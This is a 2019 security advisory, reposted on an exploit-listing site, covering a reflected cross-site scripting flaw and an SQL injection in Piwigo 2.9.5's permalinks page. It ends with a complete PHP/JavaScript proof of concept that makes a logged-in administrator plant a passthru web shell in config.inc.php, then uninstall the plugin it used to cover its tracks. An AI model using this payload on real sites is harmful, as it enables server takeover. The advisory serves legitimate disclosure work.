Piwigo 2.9.5 Cross Site Scripting / SQL Injection / Command Execution

2019.09.24
Risk: High
Local: No
Remote: Yes
CVE: N/A

########################################################################### ______ ____________ __ / ____/_ __/ / __/_ __/__ _____/ /_ / / __/ / / / / /_ / / / _ \/ ___/ __ \ / /_/ / /_/ / / __/ / / / __/ /__/ / / / \____/\__,_/_/_/ /_/ \___/\___/_/ /_/ GulfTech Research and Development ########################################################################### # Piwigo <= 2.9.5 Multiple Vulnerabilities # ########################################################################### Released Date: 2019-09-22 Last Modified: 2019-09-22 Company Info: Piwigo.org Version Info: Vulnerable Piwigo <= 2.9.5 --[ Table of contents 00 - Introduction 00.1 Background 01 - Cross Site Scripting 01.1 - Vulnerable code analysis 01.2 - Remote exploitation 02 - SQL Injection 02.1 - Vulnerable code analysis 02.2 - Remote exploitation 03 - Credit 04 - Solution 05 - Contact information --[ 00 - Introduction The purpose of this article is to detail the vulnerabilities that I found in the Piwigo software. --[ 00.1 - Background Piwigo is a popular open source photo gallery application written in PHP. --[ 01 - Cross Site Scripting Piwigo is vulnerable to a XSS issue within the "permalinks" functionality. This vulnerability can be exploited by an attacker to execute arbitrary client side code within the context of the victim client. --[ 01.1 - Vulnerable code analysis The vulnerable code can be found within the "parse_sort_variables" function which is located in admin/permalinks.php and is as follows: $url_components = parse_url( $_SERVER['REQUEST_URI'] ); $base_url = $url_components['path']; parse_str($url_components['query'], $vars); $is_first = true; foreach ($vars as $key => $value) { if (!in_array($key, $get_rejects) and $key!=$get_param) { $base_url .= $is_first ? '?' : '&amp;'; $is_first = false; $base_url .= $key.'='.urlencode($value); } } As we can see from the above code, the user supplied "REQUEST_URI" server variable is used to build the $base_url variable which is later displayed as a link to the end user. The problem with this code is that value data is urlencoded, but key data is unasanitized. This leads to a reflected XSS condition which could allow an attacker to force an authenticated admin user to perform malicious actions silently on the attackers behalf. --[ 01.2 - Remote exploitation The Javascript payload that I created was able to create a web shell on the remote host by taking the following steps once executed by an authenticated administrator. 1] Gather "pwg_token" CSRF token 2] Install LocalFilesEditor plugin 3] Activate plugin 4] Write shell to /local/config/config.inc.php 5] De activate plugin 6] Uninstall plugin 7] Redirect user to the index page Exploitation of this issue is rather straight forward, but because variables in PHP can't have dots and spaces in their names so those are converted to underscores by the call to "parse_str" in the vulnerable code shown earlier. An attacker must adhere to these limitations whenever constructing XSS payloads. --[ 02 - SQL Injection Piwigo is vulnerable to an SQL Injection issue within the "permalinks" functionality. This vulnerability can be exploited by an attacker to execute arbitrary SQL statements. --[ 02.1 - Vulnerable code analysis The vulnerable code can be found located in the admin/permalinks.php file and is as follows: if ( isset($_POST['set_permalink']) and $_POST['cat_id']>0 ) { check_pwg_token(); $permalink = $_POST['permalink']; if ( empty($permalink) ) delete_cat_permalink($_POST['cat_id'], isset($_POST['save']) ); else set_cat_permalink($_POST['cat_id'], $permalink, isset($_POST['save']) ); $selected_cat = array( $_POST['cat_id'] ); } Both the "set_cat_permalink" and "delete_cat_permalink" functions rely on the "cat_id" variable already being sanitized. However, the only sanity checks that take place with "cat_id" are to make sure it is greater than zero. This is not sufficient as PHP type juggling will cast a string that starts with a number to a valid integer for the comparison, yet the original tainted value will remain. This allows an attacker to pass a string that starts with an integer in order to achieve SQL Injection. --[ 02.2 - Remote exploitation It seems an admin account is required to exploit this issue, so I did not bother with trying to write an exploit for this issue. --[ 03 - Credit James Bercegay GulfTech Research and Development --[ 04 - Solution The issue is addressed with the following commit. https://github.com/Piwigo/Piwigo/commit/7e154ab093546e5288221685c1f8bfec2382d09a This is scheduled for release 2.10.0.RC2 --[ 05 - Contact information Web https://gulftech.org/ Mail security@gulftech.org Copyright 2019 GulfTech Research and Development. All rights reserved. --------------------------------------------------------------- 2019_piwigo_permalinks_xss_to_rce.php Proof of Concept exploit: <?php //////////////////////////////////////////////////////////////////////////////// // Piwigo <= 2.9.5 XSS to RCE Proof of Concept // James Bercegay ( http://www.gulftech.org/ ) //////////////////////////////////////////////////////////////////////////////// // Start output buffering for JavaScript content ob_start(); ?> // BEGIN JAVASCRIPT // CSRF protection token var pwg = document.forms[0].pwg_token.value; // Webshell PHP code var php = "passthru(urldecode($_REQUEST['x']));"; // LocalFilesEditor version info var rev = "6861"; var ext = "144"; // Build URL var url = "admin.php?page=plugins&tab=new&revision=" + rev + "&extension=" + ext + "&pwg_token=" + pwg; // Install plugin $.ajax({ async: false, type: "GET", url: url }); // Build URL var url = "admin.php?page=plugins&plugin=LocalFilesEditor&pwg_token=" + pwg + "&action=activate"; // Activate plugin $.ajax({ async: false, type: "GET", url: url, success: function (response) { // Build URL var url = "admin.php?page=plugin-LocalFilesEditor-localconf"; // Keep space at the beginning of php payload. It's intentional. $.post( url, { pwg_token: pwg, text: " " + php, submit: "1" } ); }}); // Build URL var url = "admin.php?page=plugins&plugin=LocalFilesEditor&pwg_token=" + pwg + "&action=deactivate"; // De Activate plugin $.ajax({ async: false, type: "GET", url: url }); // Build URL var url = "admin.php?page=plugins&plugin=LocalFilesEditor&pwg_token=" + pwg + "&action=delete"; // Uninstall plugin $.ajax({ async: false, type: "GET", url: url }); // Redirect user document.location = "admin.php"; // ENDED JAVASCRIPT <?php // Encode contents using base64 encoding. We do this because PHP strips certain // characters from key values, and will prevent loading javascript containing a // dot for example. $b64 = base64_encode(ob_get_clean()); // Formatted URL $url = '/admin.php?page=permalinks&"><script>eval(atob("%s"));</script><a+"=1'; // Output printf($url, urlencode($b64)); printf("\nSend the above URL to a logged in administrator."); printf("\nShell will be located at: local/config/config.inc.php"); ?>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top